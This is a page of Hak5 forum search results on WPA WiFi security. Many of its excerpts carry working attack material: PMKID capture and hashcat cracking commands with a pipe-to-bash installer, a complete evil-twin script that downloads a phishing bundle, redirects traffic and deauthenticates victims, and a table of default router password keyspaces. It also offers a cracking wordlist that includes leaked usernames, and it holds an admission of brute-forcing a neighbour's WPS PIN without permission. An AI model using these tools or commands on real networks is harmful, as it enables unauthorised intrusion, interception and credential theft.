Jump to content

Search the Community

Showing results for tags 'Wpa'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. PMKID Attack WPA/WPA2 on WiFi Pineapples! Pineapple NANO + TETRA WARNING! This attack is EXTREMELY effective on the Pineapples! And is capable of capturing an entire neighborhood of PMKID's in a minute or less, even without access-points! ONLY use hcxdumptool on networks and devices you have expressive permission to, because of this: hcxdumptool is able to prevent complete wlan traffic! hcxdumptool is able to capture PMKID's from access points (only one single PMKID from an access point is required!) hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required!) hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required!) hcxdumptool is able to capture extended EAPOL (RADIUS, GSM-SIM, WPS) hcxdumptool is able to capture passwords from the wlan traffic hcxdumptool is able to capture plain master-keys from the wlan traffic hcxdumptool is able to capture usernames and identities from the wlan traffic This attack was discovered accidentally while looking for new ways to attack the new WPA3 security standard. The main difference from existing attacks is that in this attack, capture of a full EAPOL 4-way handshake is not required. The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame. At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers)! The main advantages of this attack are as follow: No more regular users required - because the attacker directly communicates with the AP (aka "client-less" attack) No more waiting for a complete 4-way handshake between the regular user and the AP No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results) No more eventual invalid passwords sent by the regular user No more lost EAPOL frames when the regular user or the AP is too far away from the attacker No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds) No more special output format (pcap, hccapx, etc.) - final data will appear as regular hex encoded string The RSN IE is an optional field that can be found in 802.11 management frames. One of the RSN capabilities is the PMKID. This attack is quite new, and gets updated regularly. I've compiled it for the Pineapples and uploaded it to GitHub. As the tools gets updated often, i will have to update the packages often. So please check back for updates! Download: hcxtools (v6.1.2-1) Download: hcxdumptool (v6.1.2-1) Download and install both tools automatically by using this command on your Pineapple: wget -qO- https://raw.githubusercontent.com/adde88/hcxtools-hcxdumptool-openwrt/openwrt-19.07/INSTALL.sh | bash -s -- -v -v Last update: 18.09.2020 Changelog: Updated both tools to follow changes from upstream (@ZerBea) Install procedure: Download the IPK's to your Pineapple and install them using opkg. (If you're using the Nano remember to install them to your SD-card) How do i use this? Chose an interface, and make sure it's NOT being used on anything else! Let's use wlan1 in this example. (This will set the interface to monitor mode while working) hcxdumptool -o test.pcapng -i wlan1 --enable_status 3 This will use wlan1 to perform the attack and create a file named test.pcapng containing the PMKID. (You can try other options for --enable_status (1, 2, 4, 16 ?. Use --help for more info) Filters can also be applied with --filterlist and --filtermode (Again, read --help for details) You can then use hcxpcaptool to convert the PMKID to a hash readable by hashcat. hcxpcaptool -z test.16800 test.pcapng The next step would be to transfer test.16800 to a desktop, capable of running the latest version of hashcat. (Version 4.2.0 or higher) And then run the attack, for example like this: (This cracking process shoult NOT be done on the Pineapple!!!) hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!' Github repo. + source-codes: https://github.com/adde88/hcxtools-hcxdumptool-openwrt https://github.com/adde88/openwrt-useful-tools The first repo. contains the IPK files, and the SDK Makefiles needed to compile the project yourelf. The second repo contains alot of other useful tools i've compiled over time for the Pineapple, if you're interested in taking a peek. Donations are very helpful, and very much appreciated! And would help me contribute towards keeping all of these custom tools ported, alive, and up-to-date! ❤
  2. Compressed File Size: 4.4gb Decompressed File Size: 13gb Just thought i would share the link for those who are looking for a decent list to pen test their networks. The list contains 982,963,904 words exactly no dupes and all optimized for wpa/wpa2. Would also just like to point out that this is not my work, instead it was a guy who compiled a whole load of useful lists, including his own to come up with 2 lists (one is 11gb and one is 2gb) i will be seeding this torrent indefinitely since it is shareware! 20mb up! INFO This is my final series of WPA-PSK wordlist(S) as you can't get any better than this ! My wordlist is compiled from all known & some unknown internet sources such as; 1. openwall 2. coasts password collections 3. Xploitz Master Password Collection(s) vol 1 and vol 2 (official Backtrack 3/4/4R1 wordlist collections, Thanks Xploitz) 4. ftp sites such as; ftp://ftp.ox.ac.uk/pub/wordlists/ & others 5. all wordlists onand(as of 07/11/2010) 6. all wordlists hosted on; 7. all usernames from "100 million Facebook usernames and personal details" as leaked onto Torrent sites 8. all wordlists from the Argon (site now closed) And as a bonus my personal wordlist of 1.9 GB ! Which also includes; My "WPA-PSK WORDLIST 2 (107MB).rar" & "WPA-PSK WORDLIST (40 MB).rar" Torrent & random usernames grabed from over 30,000+ websites such as youtube, myspace, bebo & outhers sites witch i can't mention .... he he ============================================================================= ALL WITH NO DUPES OR BULL-SHIT AND IS FORMATTED TO WPA RULES OF 8-63 CHARS !! ============================================================================= Hope you enjoy. :¬) ******** P.L.E.A.S.E S.E.E.D W.H.E.N ******** The Pirate Bay Download Link ISO Hunt Download Link Torrent Hound Download Link Hope this helps any one who is starting out and learning about pen testing and network security, and don't forget to seed for others!
  3. Hello all. I have been a fan of the hak5 team for a while and over the last 2-3 years have collected pretty much everything in the hak5 shop. I have all the things that do the things. ? Recently during a fever dream, I imagined that I had a new device. One that magically grabbed 4 way WPA handshakes with the push of a button and was small enough to hold in my tiny pen testing fist. We have all been there right? We know there is a network with clients but we are just too far away to effectively do a deauth airodump attack. Sure we could get closer and open our Linux laptop, plug in a wonky antenna and fire up a couple terminals, but as if our hoody wasn't enough of an indication, now we'd really be drawing attention. Ok maybe we all haven't been there but at least I have and when I awoke from that fever dream I thought to myself, damn why didn't I think of this sooner. I need this thing to be as real as all my other things. Anyway, I went right to my work bench and started soldering away. I have started a GitHub repo for this thing that I'm tentatively calling FistBump. It's in it's beta stage for sure and a fairly simple device really, but would love some feedback. Please be constructive with your feedback, it's my first try at prototyping my own device. https://github.com/eliddell1/FistBump
  4. BESSIDE-NG - Customized for Pineapple TETRA I'm writing a relative short post, as i don't feel like writing an entire article explaining how-to install this and use this. I've compiled a customized version of besside-ng, that will automatically scan all the channels from 1 to 165. The scan will take almost a minute to complete, compared to some seconds when only scanning the 2.4GHz range. Also added option to only scan WEP or WPA networks. I've also changed the directory that the logs gets saved to. They can now be found in /tmp The files are as usual: wep.cap, wpa.cap, besside.log As usual, you can find it ready and compiled on my GitHub repo: (source-code is there as well) https://github.com/adde88/besside-ng_pineapple I will not be providing heavy support on this. I might take a couple short questions, or if you have a good idea for any improvements i might take my time and implement it. Cheerio!
  5. so i see alot of scripts like wifiphisher and fluxion they work great but the only sad part is when they clone the wireless network ...is it possible to let the user automatically connect to our fake access point by disabling their own access point..like without displaying the access point in the wifi list.
  6. Hopefully some of you will find this table useful for (legally and ethically) pentesting WiFi routers. Please note that the figures shown in the far right column 'Time' are based on a Palit GTX 970 using oclHashCat. You will need to do your own maths for this, but it gives you a good idea of average crack times for a fairly standard £300 / $500 GPU. For WPA2 with the GTX 970, my benchmarks with hashcat are; 13,774,031,184 password hashes per day 573,917,966 per hour 9,565,299 per minute 159,421 per second Anything marked as 'Never' and red will take more than a year to crack. Anything green is less than 1 week. Anything amber is unknown or will require a word list. For EE/Brightbox wordlist details, see here (appears to have been taken down. Google cache search.) For NETGEAR details, see here. Obviously most of you will find the SSID / Password Format / Length columns the most useful. Good info! SSID Length Password Format Combinations Time 2WIREXXX 10 0-9 10,000,000,000 17 hrs 3MobileWiFi 8 0-9 a-z 2,821,109,907,456 7 mth 3Wireless-Modem-XXXX 8 0-9 A-F (The first 4 digits are the same as the 4 digits on the SSID!) 65,536 1 sec Alice_XXXXXXXX 24 0-9 a-z 22,452,257,707,354,557,240,087,211,123,792,674,816 Never AOLBB-XXXXXX 8 0-9 A-Z 2,821,109,907,456 7 mth ATT### 10 0-9 10,000,000,000 17 hrs ATTxxxx 0000 10 0-9 A-Z 3,656,158,440,062,976 Never ATTxxxxxxx 12 a-z + symbols 1,449,225,352,009,601,191,936 Never belkin.xxx 8 2-9 a-f 1,475,789,056 2.5 hrs belkin.xxxx 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin.XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs Belkin_XXXXXX 8 0-9 A-F 4,294,967,296 7.5 hrs BigPondXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth BOLT!SUPER 4G-XXXX 8 4 numbers + Last 4 of SSID 65,536 1 sec BrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. BTHomeHub(1)-XXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth BTHomeHub2-XXXX 10 2-9 a-f 289,254,654,976 3 wks BTHub3 10 2-9 a-f 289,254,654,976 3 wks BTHub4 10 2-9 a-f 289,254,654,976 3 wks BTHub5 10 2-9 a-f 289,254,654,976 3 wks BTHub6 10, 12 0-9 a-z A-Z 100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000 Never CenturyLinkXXXX 14 0-9 a-f 72,057,594,037,927,936 Never Cisco 26 0-9 a-f 43,608,742,899,428,874,059,776 Never Digicom_XXXX 8 0-9 A-Z 2,821,109,907,456 7 mth DJAWEB_##### 10 0-9 10,000,000,000 17 hrs Domino-XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs E583x-xxxx 8 0-9 10,000,000 1 min E583x-xxxxx 8 0-9 A-F 4,294,967,296 7.5 hrs EasyBox 904 LTE 9 0-9 a-z A-Z 13,537,086,546,263,552 Never EasyBox-###### 9 0-9 A-F 68,719,476,736 5 days EEBrightBox-XXXXXX - 3 words, with hyphens in-between. Lengths 3-4-5 or any combination. Need dict. FRITZ!Box Fon WLAN #### 16 0-9 10,000,000,000,000,000 Never FrontierXXXX 10 0-9 10,000,000,000 17 hrs Hitron 12 0-9 A-Z (sometimes use the device’s serial number as the default key!) 4,738,381,338,321,616,896 Never INFINITUM#### 10 0-9 10,000,000,000 17 hrs iPhone 5 ? Lowercase word plus 4 numbers 172000^65,536 Need dict. Keenetic-XXXX 8 0-9 a-z A-Z 218,340,105,584,896 Never Linkem_XXXXXX 8 0-9 10,000,000 1 min Livebox-XXXX ? ? mifi2 13 0-9 A-Z 170,581,728,179,578,208,256 Never MobileWifi-xxxx 8 0-9 10,000,000 1 min MYWIFI (EE) - MYWIFI + 4 numbers 65,536 1 sec NETGEARXX - Adjective + Noun + 3 numbers Need dict. Netia-XXXXXX 13 0-9 a-f 4,503,599,627,370,496 Never ONOXXXX 10 0-9 10,000,000,000 17 hrs Orange-0a0aa0 8 0-9 a-f 4,294,967,296 7.5 hrs Orange-AA0A00 12 0-9 A-F 281,474,976,710,656 Never Orange-XXXX 8 2345679 ACEF 214,358,881 23 mins PLDT - PLDTWIFI + Last 5 digits of router MAC 1 1 sec Plusnet Broadband UK 64 a-z A-Z 0-9 - Never PlusnetWireless-XXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth PLUSNET-XXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Sitecom_XXXX 8 0-9 A-F 4,294,967,296 7.5 hrs SKYXXXXX 8 A-Z http://www.ph-mb.com/products/sky-calc 208,827,064,576 2 wks SpeedTouchXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TALKTALK-XXXXXX 8 346789 A-Z (bar ILOSZ) 282,429,536,481 3 wks TDC-#### 9 0-9 a-f 68,719,476,736 5 days Tech_XXXXXXXX 8 A-Z 208,827,064,576 15 days Technicolor-Router 10 0-9 A-F 1,099,511,627,776 2.5 mth Telecom-XXXXXXXX ? ? TelstraXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TELUSXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth Thomson 10 0-9 A-F 1,099,511,627,776 2.5 mth ThomsonXXXXXX 10 0-9 a-f 1,099,511,627,776 2.5 mth TIM_PN51T_XXXX 8 0-9 WPS PIN is 12345670 10,000,000 1 min TNCAP-XXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TNCAPXXXXXX 10 0-9 A-F 1,099,511,627,776 2.5 mth TP-LINK_###### 8 0-9 0-9 A-F 10,000,000 1 min TRENDnet TEW-123ABC 11 First 3 digits in SSID (123 here) + 8 digits https://forums.kali.org/showthread.php?26366-TRENDnet-WPA-disclosure-amp-dictionaries 2,821,109,907,456 7 mth TRKASHI-###### 8 2 numbers, 6 digits (10^2)^(26^6) Need dict. UNITE-XXXX 8 0-9 10,000,000 1 min UPCXXXXXXX 8 A-Z 208,827,064,576 15 days Verizon MIFIXXXX XXXX 11 0-9 100,000,000,000 7.5 days virginmediaXXXXXX 8 a-z (bar iol) 78,310,985,281 6 days VirginMobile MiFiXXXX XXX 11 0-9 100,000,000,000 7.5 days VMXXXXXXX 12 0-9 a-z A-Z 3,226,266,762,397,899,821,056 Never VMXXXXXXX-2G 8 a-z (bar iol) 78,310,985,281 6 days VMXXXXXXX-5G 8 a-z (bar iol) 78,310,985,281 6 days Vodaphone_XXXXXXXX 15 0-9 a-z 221,073,919,720,733,357,899,776 Never WLAN1-XXXXXX 11 0-9 A-F 17,592,186,044,416 Never ZyXELXXXXXX 13 10 0-9 A-Z 0-9 A-F 1,099,511,627,776 2.5 mth Please inform me of any inaccuracies or additional data you feel could be added. Enjoy! *edit* My sources are my own personal experiences, plus; http://xiaopan.co/forums/threads/netgearxx-wordlist.6571/ https://scotthelme.co.uk/ee-brightbox-router-hacked/ https://forum.hashkiller.co.uk/topic-view.aspx?t=1660&m=46959#46959 https://forum.hashkiller.co.uk/topic-view.aspx?t=2715&p=2
  7. Hi There, Does anyone know how to broadcast only the SSID without security, so only the open networks? My nano is now broadcasting all networks, so all the networks with password will also be broadcasted without password from my nano. Thanks!
  8. Hi all, As the title suggests, I was wondering why WPA should be easier to crack than WPA2, and yet the process to crack them appears to be the same? The hash mode in Hashcat is exactly the same for WPA and WPA2, so surely they would take the exact same amount of time to break? Is there a quicker way to break WPA? I found http://www.aircrack-ng.org/doku.php?id=tkiptun-ng, but this appears to only be for WPA-TKIP, and doesn't look like a finished product. At the moment, are we doomed to cracking WPA using the same methods as WPA2? Thanks.
  9. I have google searched for a few days, but I was hoping that someone could give me the answer I need. What is the full character set for WPA/WPA2 passwords? I believe it is a minimum of 8 digits, but I have read that the maximum is 40 and also that it is 63. Could you please clarify? I know we have all upper and lower case letters and the numbers 0-1, but I would like to know what special characters are allowed as well. so what i have for sure is: 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ There must be some special characters to add onto that. Thanks in advance.
  10. I would like to ask about tutorials on certain subjects. I know SSL stripping is already online, but there are a few things I'd like to learn to do with my wifi pineapple: viewing traffic on an open network password sniffing cracking wpa/wpa2, even if it doesn't have wps enabled (the whole process) sniffing traffic on a wpa/wpa2 network Also, I don't know if you have tutorials for all of this already, but I really think it would be good to go from beginner pineapple skills, all of the way through expert, so I could become a more experienced hacker. I don't see tutorials for every infusion out there and I think there are less then 500 different infusions for the mark v. Could someone help me out with finding english tutorials for this stuff?
  11. Hi, I want to ask, what other programs exist for finding the pass phrase of a WPA handshake besides aircrack-ng and cowpatty. For linux platform, especially server, cpu based. From what I understand, pyrit is GPU based. Whats wrong with aircrack and cowpatty? Well.. I want to use an openSUSE11 server BUT I dont have root rights to install all prerequisites and compile aircrack. Cowpatty compile and works fine, but its single threaded. I know I can break up the wordlist into e.g 4 run four instances, but sometimes it does not recognize the handshake as well as aircrack-ng. Just asking if there are any other alternatives. Thank you
  12. Pyrit WPA password cracker updated! Ive been maintaining this project for a while now, please spread the word: https://github.com/JPaulMora/Pyrit Added some extra options and performance improvements.
  13. I'm working on an eviltwin infusion for the pineapple but still have a long way to go. So far Im writting an eviltwin script without the pineapple to make sure I get that right. The script still need some work. I need help to improve it. Im writting the script base on this video #touch eviltwin #nano eviltwin (copy & paste script) #chmod +x eviltwin #./eviltwin (This will not setup your mysql database) #!/bin/bash ########################################## # Evil Twin Access Point v0.1 # # # # written by: sithstalker # # not yet tested on wifi pineapple # ########################################## #Downloading www files echo "downloading www files..." DIR1="/var/www/styles" if [ -d "$DIR1" ]; then echo "You already have the eviltwin files..." sleep 2; else echo "Getting the /var/www eviltwin files and creating backup to /var/orig-www" sleep 2; mkdir /var/orig-www && mv /var/www/* /var/orig-www/ cd /var/www && wget http://hackthistv.com/eviltwin.zip sleep 2; unzip eviltwin.zip sleep 2; fi #Killing active processes echo "Killing airbase-ng" pkill airbase-ng sleep 2; echo "Killing dhcpd" pkill dhcpd3 sleep 2; #Getting required informations echo -n "Enter you local ip address and press [ENTER] (e.g. 192.168.1.45): " read lhost echo -n "Enter your wlan interface and press [ENTER] (e.g. wlan0): " read wlan_int echo -n "Enter the subnet for your DHCP scope and press [ENTER] (e.g. 192.168.1.128): " read dhcp_subnet echo -n "Enter the subnetmask for your DHCP scope and press [ENTER] (e.g. 255.255.255.128): " read dhcp_subnetmask echo -n "Enter the broadcast address for your dhcp scope and press [ENTER] (e.g. 192.168.1.255): " read dhcp_broadcast echo -n "Enter the default gateway for your DHCP Scope and press [ENTER] (e.g. 192.168.1.129): " read dhcp_dgw echo -n "Enter the DNS Server for your DHCP Scope and press [ENTER] (e.g. 8.8.8.8): " read dhcp_dns echo -n "Enter the start address of your DHCP scope and press [ENTER] (e.g. 192.168.1.100): " read dhcp_start echo -n "Enter the last address of your DHCP scope and press [ENTER] (e.g. 192.168.1.150): " read dhcp_last echo -n "Enter the SSID you like to use for your Access Point and press [ENTER] (e.g. eviltwin): " read ssid echo -n "Enter the Channel you like to use for your Access Point and press [ENTER] (e.g. 11): " read channel echo -n "Enter the interface name which is connected to the internet and press [ENTER] (e.g. eth0): " read inet_int echo -n "Enter the target Bssid and press [ENTER] (e.g. SI:TH:ST:AL:KE:R0): " read bssid #Setting dhcpd config to /etc/dhcp3/dhcpd.conf echo "setting dhcpd config in /etc/dhcp/dhcpd.conf" sleep 2; #check if there already is a backup directory for the original dhcpd.conf file DIR="/etc/dhcp/orig_conf" if [ -d "$DIR" ]; then echo "You already have a backup directory for the original dhcpd.conf" sleep 2; else echo "You do not have a backup directory for the original dhcpd.conf file... I will create one" sleep 2; mkdir /etc/dhcp/orig_conf fi #check if there already is a backup of the original dhcpd.conf file. If not one will be created if [ "$(ls -A $DIR)" ]; then echo "You already have a backup of the original configuration file in /etc/dhcp/orig_conf" sleep 2; else echo "creating backup of original dhcpd config file to /etc/dhcp/orig_conf" sleep 2; cp /etc/dhcp/dhcpd.conf /etc/dhcp/orig_conf/dhcpd.conf rm /etc/dhcp/dhcpd.conf fi echo "default-lease-time 600; max-lease-time 7200; authoritative; subnet $dhcp_subnet netmask $dhcp_subnetmask { option subnet-mask $dhcp_subnetmask; option broadcast-address $dhcp_broadcast; option routers $dhcp_dgw; option domain-name-servers $dhcp_dns; range $dhcp_start $dhcp_stop; }" > /etc/dhcp/dhcpd.conf #Starting monitor mode on $wlan_int echo "putting $wlan_int into monitor mode. You can check that later by using iwconfig command" sleep 2; airmon-ng stop $wlan_int sleep 5; airmon-ng start $wlan_int sleep 5; ################################################################### #Starting airbase-ng with SSID=$ssid and channel=$channel echo "starting airbase-ng with SSID $ssid and channel $channel" sleep 2; airbase-ng -e $ssid -c $channel -P mon1 & sleep 5; ################################################################### #starting new generated interface at0 and assign ip address echo "starting at0 with ip $dhcp_dgw and subnetmask $dhcp_subnet and create a route for that" sleep 2; ifconfig at0 down sleep 2; ifconfig at0 $dhcp_dgw netmask $dhcp_subnetmask sleep 2; ifconfig at0 up sleep 2; route add -net $dhcp_subnet netmask $dhcp_subnetmask gw $dhcp_dgw sleep 2; #Setup iptables with nat for the new network echo "setting up iptables with nat for the new network" sleep 2; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain #iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $inet_int -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $lhost:80 iptables -t nat -A POSTROUTING -j MASQUERADE #Clear DHCP leases echo "clearing dhcp leases" sleep 2; echo > '/var/lib/dhcp/dhcpd.leases' #creating a symlink to dhcpd.pid #ln -s /var/run/dhcp3-server/dhcp.pid /var/run/dhcpd.pid #start dhcp server and enable ip forwarding echo "starting dhcp and enabling ip forwarding" sleep 2; #dhcpd3 -d -f -cf /etc/dhcp/dhcpd.conf at0 & dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 echo "1" > /proc/sys/net/ipv4/ip_forward /etc/init.d/isc-dhcp-server start echo $bssid > blacklist mdk3 mon1 d -b blacklist -c $channel
  14. After four months of relentless persistence I finally was able to bruteforce my neighbor WPS pin, After spending days of AP lock and figuring out the precise x:y Values I found that the WPA PSK is 8-digit number(like all other PSKs) but it got me thinking, What if I did a direct bruteforce to PSK. I don’t know if the AP could actually lock that (hence no new device can connect even with the right pass) but if we talk about 200 tries/day I think it can be cracked in a guaranteed 55 days (11000/200) I'm newbie at this stuff so please is there a script for that or my theory is stupid-wrong Thanks
  15. Hi I am quite new to password generation so forgive me if this is a stupid question:) I am trying to generate all possible combinations of WPA keys for BigPond modems in Australia. i have identified the layout of every single key that they generate. they look like this 1234E5678D: and its always the same layout " the first 4 characters are numbers, then the 5th character is a capital letter. then the next 4 are numbers again and the last is a letter" but for the life of me i cannot seem to work out how to generate keys with such specific parameters? any ideas how i would accomplish this? any help would be much appreciated.
  16. Hey Everyone. Who has heard of Sophos? or Warbiking? prehaps you may know it as War Driving Sophos is a UK Based Security company and they are doing a very nice job of showing security experts the general habits of the people hungry for Wifi. Whats very intresting - is he is doing it all with the Hak 5 Wifi Pineapple. If you watch a video you can see it there - clearly James is not about to reveal what it really is loosly calling it a "Access point" but any one from here will see its a Mk 5. Latest News artical - 'Warbiking' reveals increasing need for Sydneysiders to change wireless security habitshttp://www.cmo.com.au/mediareleases/19781/warbiking-reveals-increasing-need-for/ For those of you in London, San Fran etc, you may find your city has already been "Warbiked" by this fellow. http://www.sophos.com/en-us/security-news-trends/security-trends/bottom-line/project-warbike.aspx As This fellow is not going to get to every town and city - it would be cool to see other members survey results. how does your town compare to the recent results of Sydney?
  17. Hello everyone, I apologize if I have missed a thread where this has been covered and appreciate your help and time ^^ I have this card and I could set the tx power on windows 7 and after installing windows 8.1 pro I cannot find this option anymore, help ? I think there is an option to set the tx power even higher, anyone know? Problem I have is when I use windows 7 in VMWare, for some reason there isn't any tx power option, maybe only when it's installed as host? Also I have other questions regarding finding wpa key, can I post it here?
  18. Hello, I've been using the pineapple's client mode quite happily on my routers in location 1, but am having no luck with any in location 2 - something I must assume is due to encryption types. I had read a few topics here regarding the issue (in particular one from 2013 mentioning a config alteration) but haven't had any luck. If someone could point me to existing topics on the matter or tell me what logs to post here for diagnosis that'd be great. Cheers, HP
  19. I have 2 additional wireless adaptors connected to my MK5 and I need to connect wlan3 to a WPA/WPA2 wireless network. What command do I run to connect to a WPA/WPA2 wireless network? Interface Chipset Driver wlan0 Atheros ath9k - [phy0] wlan1 RTL8187 rtl8187 - [phy1] wlan2 RTL8187 rtl8187 - [phy2] wlan3 Atheros ath9k - [phy3]
  20. I know that decrypting WiFi WPA encrypted traffic when 4-way handshake is in the traffic dump and when passphrase is known is a trivial task. However, what about decrypting WPA traffic when 4-way handshake is not available. I have the SSID, I have the passphrase, I have messages 3 and 4 (I know it is useless) of the 4-way handshake. Is there a way of decrypting the traffic?
  21. So I know that the router generates random passwords in this structure: xxxx-xxxx-xxxx It uses all loweralphnumeric and includes the dashes, but no other special characters. I've been reading about generating rainbow tables, but all the options include too much, or wont allow me to generate 12 character long passwords. But I don't know if I totally understand the process yet, I'm still reading. Does anyone know a good way of generating either plaintext dictionary or rainbow tables that fit this specific format only? I want to create a dictionary that includes all possible combinations for this format. Correct me if I'm wrong, but there should be: 62^12 = 3,226,266,762,397,899,821,056 possible combinations? This if for my personal TP-Link router that I bought. Noticed this default password formatting and want to see if I can generate a customized table for it. Really appreciate any advice or input.
  22. What is FruityCracker? FruityCracker is a bash script that can crack wireless networks , capture wpa handshakes , Evil twin (Open,Wep,Wpa,Wpa2 ) and more features to come ! Compatibility Tested Configuration: Pineapple MK5 1.0.4 Questions or Problems Please Let me know what you would like to see in this script below ! Release Date Unknown. Author : Jesse Izeboud Other scripts i made : FruitySniffer
  23. Is it and how it's possible to capture handshakes with one device and send all captured handshakes to other device for cracking? Cracking device isn't in wireless range. Handshake device have 3G mobile broadband.
  24. I have been using reaver to brute-force attack a WPA/WPA2 connection , But i seem to have a problem , The WPS pin cannot be found , It stops searching for a PIN at a specific place. Why is this happening ? And by the way i am using reaver from BEINI OS , Using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and i've got it but i cannot crack it since i don't have a proper dictionary to and i don't have the means to download one. I look forward to a reply to this thread. Thank you ^_^
  25. I have been using reaver to brute-force attack on my WPA/WPA2 connection , But i seem to have a problem , The WPS pin cannot be found , It stops searching for a PIN at a specific place. Why is this happening ? And by the way i am using reaver from BEINI OS , Using Minidwep-gtk. I have searched for the WPA/WPA2 handshake and i've got it but i'm not sure if it really has a PSK or not because i tried cracking it using Cloudcracker and so far unsuccessful. I've tried with the 1.2 billion dictionary word list and i was unsuccessful. The router i am using for the WiFi is a Belkin 3bb9 router which is known for it's security standards. So my question is how do i fix this outcome for a positive one and what should i try? Arguments used on reaver : I Used the following arguments in reaver : -a -v -S -x 20 -r 100:10 -l 300 And the output is : Waiting for beacon from : 08:86:3B:FD:CB:B0 Associalted with 08:86:3B:FD:CB:B0 (BSSID: belkin.3bb9) Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 (0.00% complete @ 2013-06-26 :18:53 (0 seconds/pin) WARNING 10 false connections in a row Trying pin 12345670 Trying pin 12345670 Trying pin 12345670 And it goes on as the same... No change. Is there any solution to this? and I Used Wireless card : wlan0 Atheros AR9285 ath9k-[phy0]. I have atta
×
×
  • Create New...